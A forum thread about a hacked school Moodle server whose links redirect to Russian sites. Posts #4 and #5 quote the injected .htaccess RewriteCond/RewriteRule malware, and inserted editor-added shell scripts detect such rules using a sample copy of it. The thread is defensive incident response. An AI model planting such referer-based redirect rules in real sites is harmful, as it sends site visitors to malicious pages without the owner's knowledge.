  1. #1

    Join Date
    May 2010
    Location
    Stoke on Trent
    Posts
    79
    Thank Post
    8
    Thanked 4 Times in 4 Posts
    Rep Power
    10

    Moodle hacked

    Hi,

    It looks like our Moodle has been hacked. When a user tries to find a course using 'Search Courses', clicking on any of the links on the returned page will send them to somewhere random on the internet - mainly Russian sites, such as:

    diskwarrioradvertisements.ru/Documentation?8

    ** By Links, I mean ALL links on the page. Even to the users profile, logout etc.

    Moodle & php are not really my thing, so I'm in the dark here.

    I can see that the 'Search Courses' 'GO' button fires up courses/search.PHP & I've tried replacing this with another php file which I know is clean but it still does the same thing. Search.PHP has a couple of includes (config.php and lib.php) so I'll check them.

    I've also searched the database for the Russian site mentioned above but I can't find it, so I guess it must be hardcoded into a php script somewhere?

    Everything else works fine. You wouldn't know there was anything wrong unless you searched for a course. I'd like to solve this with a minimum of fuss & take measures to prevent it happening again.

    We are running Moodle 1.9 on an Ubuntu server

    Cheers!
    Last edited by CapnPugwash; 4th September 2012 at 03:03 PM.

  2. #2

    TechMonkey
    Join Date
    Dec 2005
    Location
    South East
    Posts
    3,303
    Thank Post
    226
    Thanked 412 Times in 305 Posts
    Rep Power
    163
    I would just replace all the files with ones from a download. Otherwise you can't guarantee what other nasties are hiding.

  3. #3

    Oaktech
    Join Date
    Jul 2011
    Location
    Bournemouth
    Posts
    2,964
    Thank Post
    838
    Thanked 578 Times in 451 Posts
    Rep Power
    275
    If you have a backup, now would be a good time to use it...

  4. #4

    Steve21
    Join Date
    Feb 2011
    Location
    Swindon
    Posts
    2,717
    Thank Post
    341
    Thanked 517 Times in 485 Posts
    Rep Power
    180
    Quote Originally Posted by CapnPugwash:
    Hi,

    It looks like our Moodle has been hacked. When a user tries to find a course using 'Search Courses', clicking on any of the links on the returned page will send them to somewhere random on the internet - mainly Russian sites, such as:

    diskwarrioradvertisements.ru/Documentation?8

    ** By Links, I mean ALL links on the page. Even to the users profile, logout etc.

    Moodle & php are not really my thing, so I'm in the dark here.

    I can see that the 'Search Courses' 'GO' button fires up courses/search.PHP & I've tried replacing this with another php file which I know is clean but it still does the same thing. Search.PHP has a couple of includes (config.php and lib.php) so I'll check them.

    I've also searched the database for the Russian site mentioned above but I can't find it, so I guess it must be hardcoded into a php script somewhere?

    Everything else works fine. You wouldn't know there was anything wrong unless you searched for a course. I'd like to solve this with a minimum of fuss & take measures to prevent it happening again.

    We are running Moodle 1.9 on an Ubuntu server

    Cheers!
    Clough hall by any chance?

    Seems there's a lot of redirect hacks going around at the moment within schools.

    Most of them are editing the htaccess files, and putting redirects within them (often in white text).

    Check for a line like this in your htaccess files

    Code:
    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|..suchmaschine|web-archiv|infospace)\.(.*)
    RewriteRule ^(.*)$ http://diskwarrioradvertisements.ru/Documentation?8 [R=301,L]
    Might be slightly different obviously depending on your version of it, but might help.

    Steve

  5. #5

    Steve21
    Join Date
    Feb 2011
    Location
    Swindon
    Posts
    2,717
    Thank Post
    341
    Thanked 517 Times in 485 Posts
    Rep Power
    180
    There we go, even found a few examples of people with the same one online

    Code:
    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|filesearch|yell|openstat|metabot|gigablast|entireweb|amfibi|dmoz|yippy|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|infospace)\.(.*)
    RewriteRule ^(.*)$ http://diskwarrioradvertisements.ru/Documentation?8 [R=301,L]
    RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|freenet|arcor|alexana|tiscali|kataweb|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|westaustraliaonline)\.(.*)
    RewriteRule ^(.*)$ http://diskwarrioradvertisements.ru/Documentation?8 [R=301,L]
    Anything that's like that is all bad in .htaccess files

    Steve
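The rule sets Steve quotes have a fixed shape, so a script can hunt for them rather than a person scrolling through each file. The following is an added example, not code from this thread or from Moodle: a POSIX shell script that lists every RewriteCond testing HTTP_REFERER and every RewriteRule pointing at an absolute http(s) URL in the .htaccess files under a directory, counts the blank lines used to push such rules out of an editor's view, and evaluates a shortened copy of the quoted condition against a few Referer values. The temp directory layout, the host redirect.invalid and the Referer URLs are constructed for the demo; the Moodle course search path course/search.php is an assumption. One thing the last part shows is that a list containing the bare word `search`, as the second quoted rule set does, also matches the Referer sent when a link is clicked on a page named search.php, so the condition does not only fire for visitors arriving from search engines.

```shell
#!/bin/sh
# Added example, not from the thread: look for referer-conditioned off-site
# redirects in .htaccess files and check how a Referer value fares against
# the quoted condition. All paths, hosts and URLs below are constructed.

# Print file:line:text for every RewriteCond that inspects HTTP_REFERER and
# every RewriteRule whose target is an absolute http(s) URL (an off-site
# redirect), for each .htaccess found under the given directory.
find_redirect_rules() {
    find "$1" -type f -name '.htaccess' | while read -r f; do
        grep -n -i -E 'RewriteCond.*HTTP_REFERER|RewriteRule.*https?://' "$f" \
            | sed "s|^|$f:|"
    done
}

count_redirect_rules() {
    find_redirect_rules "$1" | wc -l | tr -d ' '
}

# Count whitespace-only lines; hundreds of them in a short .htaccess mean
# something was pushed far below what a text editor shows on screen.
blank_line_count() {
    grep -c -E '^[[:space:]]*$' "$1" || true
}

# Exit 0 if REFERER satisfies PATTERN. The quoted RewriteCond patterns use only
# syntax that means the same in Apache's PCRE and in POSIX ERE, so grep -E gives
# the answer Apache would (a rule carrying [NC] would need grep -i as well).
referer_matches() {
    printf '%s\n' "$2" | grep -q -E "$1"
}

# Build a constructed tree: one clean .htaccess and one carrying the quoted
# rule shape after 300 blank lines. Prints the temp directory path.
make_sample() {
    d=$(mktemp -d)
    mkdir -p "$d/moodle/course"
    printf 'Options -Indexes\n' > "$d/moodle/course/.htaccess"
    {
        printf 'RewriteEngine On\n'
        i=0; while [ "$i" -lt 300 ]; do printf '\n'; i=$((i + 1)); done
        printf 'RewriteCond %%{HTTP_REFERER} ^.*(google|ask|yahoo|search|infospace)\\.(.*)\n'
        printf 'RewriteRule ^(.*)$ http://redirect.invalid/Documentation?8 [R=301,L]\n'
    } > "$d/moodle/.htaccess"
    printf '%s\n' "$d"
}

# A shortened form of the condition from the second quoted rule set; note the
# bare word "search" in the alternation.
LIST='^.*(google|ask|yahoo|search|infospace)\.(.*)'

SAMPLE=$(make_sample)
echo "suspicious rules under $SAMPLE:"
find_redirect_rules "$SAMPLE"
echo "blank lines in moodle/.htaccess: $(blank_line_count "$SAMPLE/moodle/.htaccess")"
for r in 'http://www.google.co.uk/search?q=moodle' \
         'http://vle.example.sch.uk/course/search.php?search=maths' \
         'http://vle.example.sch.uk/login/index.php'; do
    if referer_matches "$LIST" "$r"; then
        echo "would redirect: $r"      # a listed word followed by a literal dot
    else
        echo "would pass:     $r"
    fi
done
rm -rf "$SAMPLE"
```

Run it from the web root on the server (`sh scan.sh` after replacing the constructed sample with the real path) and read every file it names in full, not just the lines it prints: the grep only catches the two directive forms quoted here, and a rule written with different directives would need its own pattern.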

  6. #6

    Join Date
    May 2010
    Location
    Stoke on Trent
    Posts
    79
    Thank Post
    8
    Thanked 4 Times in 4 Posts
    Rep Power
    10
    Hi Steve, thanks for that - how did you know I was from Clough Hall?

    OK, here's how it's looking. Moodle isn't something I know a lot about but it looks like there are three areas - the database, the course data & Moodle itself.

    I've searched the database for any mention of the dodgy web sites and it's clean. I've replaced the main Moodle folder with one that I know is clean and that didn't change anything. So I'm assuming it's in the data part where the courses are. We do back up the Moodle server but the problem wasn't reported for a few weeks....

    It makes total sense that it's a htaccess file issue... but I've checked every one of them and can't find anything!

    What could I be missing? I could be making some poor assumptions here so please feel free to correct me.

  7. #7

    Steve21
    Join Date
    Feb 2011
    Location
    Swindon
    Posts
    2,717
    Thank Post
    341
    Thanked 517 Times in 485 Posts
    Rep Power
    180
    Can pretty much guarantee it's at least partially a htaccess issue. As it'll fire off every time I redirect from Google to your site, yet not when loading it directly. It's even doing it off your main VLE page, without searching/logging in.

    Also seems to be changing where it's redirecting to, unless you've done a clean and got infected again? (From your comment above, guessing you replaced main folder, but not the actual issue)

    See below:

    cloughall1.jpg

    cloughall2.jpg


    When you checked your htaccess files did you check white space too? Often adds millions of white lines into them, to stop you scrolling down further etc

    Depends on your opinion of course, but any objection to uploading some of your htaccess files so we can take a look? Understand if you don't want to though.

    Steve

  8. #8

    Join Date
    May 2010
    Location
    Stoke on Trent
    Posts
    79
    Thank Post
    8
    Thanked 4 Times in 4 Posts
    Rep Power
    10
    Hi Steve,

    I'd be happy to let you see the htaccess files, I really need to get to the bottom of this. When I've looked at the files, I've done a search for 'RewriteCond' - I hoped that this would get around the white text issue.

    Yes, I replaced the main Moodle folder so I presume, whatever is lurking in there has *got* to be in the MoodleData folder - am I right?

    Cheers for your help, much appreciated.

  9. #9


    Join Date
    May 2009
    Posts
    3,262
    Thank Post
    287
    Thanked 880 Times in 658 Posts
    Rep Power
    339
    @CapnPugwash - how are you searching? Using grep from a shell on the box should be fairly foolproof.

    Also how did you search the database?
    Last edited by pcstru; 10th September 2012 at 06:59 PM.

  10. #10

    Join Date
    May 2010
    Location
    Stoke on Trent
    Posts
    79
    Thank Post
    8
    Thanked 4 Times in 4 Posts
    Rep Power
    10
    Hi,

    Well, you're exposing my ignorance here (which is a good thing for me). I've just been opening the htaccess files as text files and doing a standard word search.

  11. #11


    Join Date
    May 2009
    Posts
    3,262
    Thank Post
    287
    Thanked 880 Times in 658 Posts
    Rep Power
    339
    Probably my poor assumption. You are running on a Windows box - not a *nix box?

  12. #12

    Join Date
    May 2010
    Location
    Stoke on Trent
    Posts
    79
    Thank Post
    8
    Thanked 4 Times in 4 Posts
    Rep Power
    10
    I'm running Moodle on an Ubuntu server. TBH, I don't know much about it, it was set up by a fella who left a while back and I've never had the time to sit down and get to grips with it.

  13. #13


    Join Date
    May 2009
    Posts
    3,262
    Thank Post
    287
    Thanked 880 Times in 658 Posts
    Rep Power
    339
    Ok. So how did you do the database search? How did you 'open text files'? If you could use ssh or telnet to login to the box and use a recursive grep search to look for the offending rewrite rules from the web root, that shouldn't miss anything. Similarly for the database, using mysqldump to produce a text file of the database then grepping that will be quite thorough.
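The search pcstru describes, as an added example that is not part of this thread or of Moodle: a POSIX shell script with three small functions, one that lists every text file under a set of directories containing an indicator string (grep -r descends into dotfiles such as .htaccess, which a desktop file search may skip), one that lists every Rewrite directive wherever it lives, and one that counts matches in a database dump. Because mod_rewrite directives are equally valid in Apache's own configuration, the sweep covers the /etc/apache2 tree as well as the web root and moodledata, which a search confined to the two Moodle folders would never reach. Everything searched is constructed in a temp directory so the script runs offline; the database name in the mysqldump comment and the host redirect.invalid are assumptions.

```shell
#!/bin/sh
# Added example, not from the thread: the shell-based sweep suggested above,
# run against a constructed directory tree and a constructed dump file so it
# works offline. On a real server the roots would be the web root, the
# moodledata directory and /etc/apache2, and the dump would come from mysqldump.

# List every text file under the given roots that contains the indicator
# (fixed string, not a regex). -r descends into dotfiles such as .htaccess,
# -I skips binaries, -l prints matching file names only.
sweep_tree() {
    indicator="$1"; shift
    grep -r -l -I -F -e "$indicator" "$@" 2>/dev/null || true
}

# Show every Rewrite directive under the given roots, wherever it lives:
# .htaccess files, but also virtual-host files, which sit outside both the
# Moodle code and moodledata directories.
find_rewrite_directives() {
    grep -r -n -i -E -e 'Rewrite(Cond|Rule)' "$@" 2>/dev/null || true
}

# Count dump lines containing the indicator. Produce the dump first with
#   mysqldump -u root -p moodle > /tmp/moodle.sql     (database name assumed)
sweep_dump() {
    grep -c -F -e "$2" "$1" || true
}

# Constructed sample: clean Moodle code and data, a vhost config carrying a
# referer-conditioned redirect, and a dump with nothing in it. Prints the
# temp directory.
make_sample() {
    d=$(mktemp -d)
    mkdir -p "$d/www/moodle/course" "$d/moodledata/sessions" "$d/etc/apache2/sites-enabled"
    printf '<?php // clean file\n' > "$d/www/moodle/course/search.php"
    printf 'Options -Indexes\n' > "$d/www/moodle/.htaccess"
    printf 'sess_abc\n' > "$d/moodledata/sessions/sess_abc"
    {
        printf '<VirtualHost *:80>\n  RewriteEngine On\n'
        printf '  RewriteCond %%{HTTP_REFERER} ^.*(google|yahoo)\\.(.*)\n'
        printf '  RewriteRule ^(.*)$ http://redirect.invalid/Documentation?8 [R=301,L]\n'
        printf '</VirtualHost>\n'
    } > "$d/etc/apache2/sites-enabled/000-default"
    printf 'INSERT INTO mdl_course VALUES (1,"Maths");\n' > "$d/moodle.sql"
    printf '%s\n' "$d"
}

S=$(make_sample)
echo "files containing redirect.invalid (Moodle folders only):"
sweep_tree redirect.invalid "$S/www" "$S/moodledata"      # prints nothing
echo "files containing redirect.invalid (including Apache config):"
sweep_tree redirect.invalid "$S/www" "$S/moodledata" "$S/etc/apache2"
echo "rewrite directives:"
find_rewrite_directives "$S/www" "$S/etc/apache2"
echo "dump lines mentioning redirect.invalid: $(sweep_dump "$S/moodle.sql" redirect.invalid)"
rm -rf "$S"
```

On the real box the indicator would be one of the redirect hosts seen in the browser, and a dump that comes back with zero hits, as the constructed one does here, is what tells you the target is not stored in the database and the file-system side needs the attention.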

  14. #14

    Join Date
    May 2010
    Location
    Stoke on Trent
    Posts
    79
    Thank Post
    8
    Thanked 4 Times in 4 Posts
    Rep Power
    10
    Quote Originally Posted by pcstru:
    Ok. So how did you do the database search? How did you 'open text files'? If you could use ssh or telnet to login to the box and use a recursive grep search to look for the offending rewrite rules from the web root, that shouldn't miss anything. Similarly for the database, using mysqldump to produce a text file of the database then grepping that will be quite thorough.
    Hi,

    I used PHPMYADMIN to search the database
    In Ubuntu I searched for the htaccess files, right clicked on them and opened in a text editor

    I'll have a look at grep, thanks for the pointer

  15. #15

    Join Date
    May 2010
    Location
    Stoke on Trent
    Posts
    79
    Thank Post
    8
    Thanked 4 Times in 4 Posts
    Rep Power
    10
    Well, after looking at this all morning, I'm now more confused than ever.

    To recap: I'm running Moodle 1.9 on an Ubuntu server.

    When users log into Moodle, everything seems all right. However, when they 'Search Courses', the returned page will look all right (hovering the mouse over all the links, I can see they are as they should be) but clicking on any link will take them to one of these types of pages:

    unchallengedminimoogs.ru
    oomphstereomono.ru
    convertednextpages.ru

    I replaced my Moodle folder with a 'clean' version
    I renamed my current MoodleData folder and created a new one with three empty folders inside (cache, sessions, and temp)

    I then went to my Moodle site, logged in and checked the 'search courses' functionality - same problem with the nasty re-directs.

    I did an SQLdump of my database, opened it in a text editor and searched for any reference to the websites mentioned - found nothing.

    .... I really don't understand.... I agree with Steve, the most obvious culprit is a hacked htaccess file... but if it's not in either my Moodle or MoodleData folders.... where could it be?!
